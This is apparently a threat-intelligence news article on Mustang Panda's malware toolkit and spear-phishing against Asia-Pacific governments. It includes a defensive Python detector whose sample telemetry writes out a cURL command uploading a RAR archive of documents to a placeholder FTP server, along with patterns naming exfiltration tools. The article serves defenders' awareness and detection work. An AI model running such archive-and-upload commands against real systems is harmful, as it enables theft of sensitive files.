Mustang Panda Refines Malware Arsenal to Target Asia-Pacific Governments
Overview
The threat actor known as Mustang Panda has significantly upgraded its malware toolkit, enabling advanced data exfiltration and the deployment of sophisticated payloads, as detailed in a recent report by Trend Micro. This group, monitored under the name Earth Preta, has been particularly active in cyber espionage campaigns aimed at government entities throughout the Asia-Pacific (APAC) region.
Recent Developments
Trend Micro’s findings highlight the propagation of a malware variant known as PUBLOAD, which is being spread via a worm variant called HIUPAN. PUBLOAD, a downloader linked to Mustang Panda since early 2022, plays a crucial role in cyber-attacks by facilitating the delivery of the PlugX malware.
Malware Features and Functions
PUBLOAD is designed not only to execute reconnaissance on infected networks but also to harvest sensitive files, including documents and spreadsheets. Additionally, it serves as a conduit for supplemental tools like FDMTP, a secondary control tool, and PTSOCKET, an alternative method for exfiltrating data.
The exfiltrated files are typically compressed into a RAR archive and uploaded to an attacker-controlled FTP server with cURL. Mustang Panda also uses its custom PTSOCKET tool as a multi-threaded alternative for transferring the files out.
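The archive-then-upload pattern above is something a defender can correlate in process-creation telemetry. The following is an added example written for this article, not code from Trend Micro or the report; the hosts, paths, timestamps and server address are constructed placeholders, and the event dict layout is an assumption standing in for Sysmon/EDR fields.

```python
from datetime import datetime, timedelta

ARCHIVERS = {"rar.exe", "winrar.exe", "rar"}
CURL = {"curl.exe", "curl"}
WINDOW = timedelta(minutes=30)  # how long after archiving an upload is still correlated

def _basename(image):
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_rar_archive_cmd(event):
    # archiver invoked with a .rar name anywhere on the command line
    tokens = event["cmdline"].split()
    return _basename(event["image"]) in ARCHIVERS and any(t.strip('"').lower().endswith(".rar") for t in tokens)

def is_curl_ftp_upload(event):
    # cURL with an upload switch AND an ftp(s):// destination; plain FTP downloads do not match
    if _basename(event["image"]) not in CURL:
        return False
    tokens = [t.strip('"') for t in event["cmdline"].split()]
    has_upload = any(t in ("-T", "--upload-file") or t.startswith("--upload-file=") for t in tokens)
    has_ftp = any(t.lower().startswith(("ftp://", "ftps://")) for t in tokens)
    return has_upload and has_ftp

def detect_rar_then_ftp_upload(events, window=WINDOW):
    """One finding per cURL FTP upload preceded (within `window`) by RAR creation on the same host."""
    findings, by_host = [], {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host.setdefault(ev["host"], []).append(ev)
    for host, evs in by_host.items():
        archives = [e for e in evs if is_rar_archive_cmd(e)]
        for ev in evs:
            if not is_curl_ftp_upload(ev):
                continue
            prior = [a for a in archives if timedelta(0) <= ev["ts"] - a["ts"] <= window]
            if prior:  # most recent archive command before the upload
                findings.append({"host": host, "archive_cmd": prior[-1]["cmdline"], "upload_cmd": ev["cmdline"]})
    return findings

# Constructed sample telemetry (hostnames, paths and the TEST-NET address are placeholders).
T0 = datetime(2024, 6, 3, 10, 0)
SAMPLE_EVENTS = [
    {"host": "WS-01", "ts": T0, "image": r"C:\Tools\rar.exe",
     "cmdline": r'rar.exe a -r C:\Users\Public\out.rar "C:\Users\u\Documents\*.docx" "*.xlsx"'},
    {"host": "WS-01", "ts": T0 + timedelta(minutes=4), "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -T C:\Users\Public\out.rar ftp://203.0.113.10/up/"},
    {"host": "WS-02", "ts": T0, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -o update.bin ftp://203.0.113.10/update.bin"},  # download only: benign here
    {"host": "WS-03", "ts": T0 + timedelta(hours=2), "image": r"C:\Tools\rar.exe",
     "cmdline": r"rar.exe a C:\Temp\backup.rar C:\Temp\logs"},  # archive with no upload
]

if __name__ == "__main__":
    for f in detect_rar_then_ftp_upload(SAMPLE_EVENTS):
        print(f"[{f['host']}] {f['archive_cmd']!r} -> {f['upload_cmd']!r}")
```

Only the WS-01 pair fires; a lone RAR job or a cURL FTP download does not, which keeps the rule usable on hosts where either tool is legitimately present.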
Spear-Phishing Campaigns
In June 2024, Trend Micro identified a “fast-paced” spear-phishing campaign linked to Mustang Panda. This campaign distributed emails with .url attachments that, when activated, deployed a signed downloader known as DOWNBAIT. Targeted countries included Myanmar, the Philippines, Vietnam, Singapore, Cambodia, and Taiwan, with specific filenames and decoy documents tailored to these regions.
DOWNBAIT serves as a first-stage loader that retrieves and executes PULLBAIT shellcode in memory. This shellcode subsequently downloads and launches a backdoor referred to as CBROVER, which allows for file downloads and remote shell execution, ultimately facilitating the deployment of the PlugX remote access trojan (RAT).
Evolving Tactics
Recent reports from Palo Alto Networks’ Unit 42 have revealed that Mustang Panda has also exploited Visual Studio Code’s embedded reverse shell feature, indicating a shift in their operational tactics. This evolution points to a more sophisticated approach to infiltrating target networks.
Conclusion
The advances observed in Earth Preta's malware and deployment strategies underscore the ongoing threat to government entities in the Asia-Pacific region. As Mustang Panda continues to refine its tradecraft, from multi-stage downloaders to the use of cloud services for data exfiltration, organizations in the region need to stay informed and vigilant to reduce the resulting risk.